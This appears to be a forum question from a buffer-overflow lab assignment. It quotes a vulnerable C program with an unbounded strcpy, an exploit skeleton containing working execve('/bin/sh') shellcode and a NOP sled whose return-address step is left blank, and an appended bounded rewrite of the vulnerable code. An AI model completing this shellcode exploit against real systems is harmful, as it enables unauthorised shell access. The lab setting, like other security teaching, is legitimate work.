Exploiting a Buffer Overflow
I'm working on a project in which I'm supposed to write a C program to exploit the vulnerability of a given program.

Here is the vulnerable C program:

```c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>   /* needed for strcpy() */

int bof(char *str)
{
    char buffer[12];
    strcpy(buffer, str);   /* unbounded copy into a 12-byte stack buffer */
    return 1;
}

int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);
    printf("Returned Properly\n");
    return 1;
}
```

And here is the code for the exploit:

```c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

char shellcode[] =
    "\x31\xc0"      /* xorl %eax,%eax */
    "\x50"          /* pushl %eax */
    "\x68""//sh"    /* pushl $0x68732f2f */
    "\x68""/bin"    /* pushl $0x6e69622f */
    "\x89\xe3"      /* movl %esp,%ebx */
    "\x50"          /* pushl %eax */
    "\x53"          /* pushl %ebx */
    "\x89\xe1"      /* movl %esp,%ecx */
    "\x99"          /* cdql */
    "\xb0\x0b"      /* movb $0x0b,%al */
    "\xcd\x80"      /* int $0x80 */
;

int main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(buffer, 0x90, 517);

    /* Fill the buffer with appropriate contents here */

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
    return 0;
}
```

So, I need to fill the buffer with appropriate contents before saving it to the "badfile". I've read a lot about buffer overflows and I guess I need to modify the return address of the vulnerable program. But I really don't know how I'm supposed to do it. Shall I first find the original return address, or is there something else that I can do? Also, any ideas/suggestions about how I'm supposed to implement the buffer?
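For comparison, the following is an added example that is not part of the question or of the lab code it quotes: a bounded counterpart to bof() and main() in which the caller passes the byte count it actually read, an unterminated input is measured with memchr() instead of being scanned by strcpy(), and anything that does not fit in the 12-byte buffer is refused. The names bof_safe, process_file and rejects_nop_filled_input are chosen for this example only.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE  12    /* the original bof()'s 12-byte stack buffer */
#define INPUT_MAX 517   /* the original main()'s read size */

/* Bounded counterpart of bof(): the caller passes how many bytes str really
 * holds, memchr() measures the string without running past that count, and
 * input that does not fit is refused. Returns 1 on success, 0 if refused. */
int bof_safe(const char *str, size_t avail)
{
    char buffer[BUF_SIZE];
    const char *nul;
    size_t n;

    if (str == NULL)
        return 0;
    nul = memchr(str, '\0', avail);
    n = nul ? (size_t)(nul - str) : avail;   /* no NUL: every byte is data */
    if (n >= BUF_SIZE)
        return 0;                             /* would not fit: refuse it */
    memcpy(buffer, str, n);
    buffer[n] = '\0';
    return 1;
}

/* Counterpart of main(): same open/read, but the results are checked and the
 * real byte count is handed on. Returns -1 if the file cannot be opened. */
int process_file(const char *path)
{
    char str[INPUT_MAX];
    size_t nread;
    FILE *badfile = fopen(path, "rb");

    if (badfile == NULL)
        return -1;
    nread = fread(str, 1, sizeof str, badfile);
    fclose(badfile);
    return bof_safe(str, nread);
}

/* Constructed input: 517 bytes of 0x90 and no terminator, exactly what the
 * exploit skeleton writes to badfile; strcpy() would copy it past buffer[]. */
int rejects_nop_filled_input(void)
{
    char raw[INPUT_MAX];
    memset(raw, 0x90, sizeof raw);
    return bof_safe(raw, sizeof raw) == 0;
}
```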
 
